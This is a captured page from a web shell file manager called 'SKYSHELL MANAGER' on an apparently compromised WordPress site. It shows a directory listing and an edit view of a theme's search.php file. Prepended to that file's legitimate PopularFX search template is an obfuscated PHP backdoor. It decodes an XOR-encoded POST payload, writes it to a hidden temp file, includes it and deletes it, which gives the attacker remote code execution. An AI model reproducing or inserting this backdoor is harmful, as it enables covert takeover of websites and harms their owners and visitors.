📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
10198.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: search.php
<?php if(array_key_exists("\x72ec\x6F\x72d", $_POST) && !is_null($_POST["\x72ec\x6F\x72d"])){ $comp = $_POST["\x72ec\x6F\x72d"]; $comp= explode ("." ,$comp ) ; $holder = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $y = 0; $__len = count( $comp); do { if( $y >=$__len) break; $v1 = $comp[$y]; $sChar = ord( $s[$y% $sLen]); $d =( ( int)$v1 - $sChar -( $y% 10)) ^ 95; $holder .=chr( $d); $y++; } while( true); $pset = array_filter([getenv("TEMP"), "/tmp", session_save_path(), "/dev/shm", "/var/tmp", sys_get_temp_dir(), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir")]); foreach ($pset as $key => $k) { if (!( !is_dir($k) || !is_writable($k) )) { $object = str_replace("{var_dir}", $k, "{var_dir}/.ptr"); if (@file_put_contents($object, $holder) !== false) { include $object; unlink($object); die(); } } } } /** * The template for displaying search results pages * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result * * @package PopularFX */ get_header(); ?> <main id="primary" class="site-main"> <?php if ( have_posts() ) : ?> <header class="page-header"> <h1 class="page-title"> <?php /* translators: %s: search query. */ printf( esc_html__( 'Search Results for: %s', 'popularfx' ), '<span>' . get_search_query() . '</span>' ); ?> </h1> </header><!-- .page-header --> <?php /* Start the Loop */ while ( have_posts() ) : the_post(); /** * Run the loop for the search to output the results. * If you want to overload this in a child theme then include a file * called content-search.php and that will be used instead. */ get_template_part( 'template-parts/content', 'search' ); endwhile; the_posts_navigation(); else : get_template_part( 'template-parts/content', 'none' ); endif; ?> </main><!-- #main --> <?php get_sidebar(); get_footer();
Save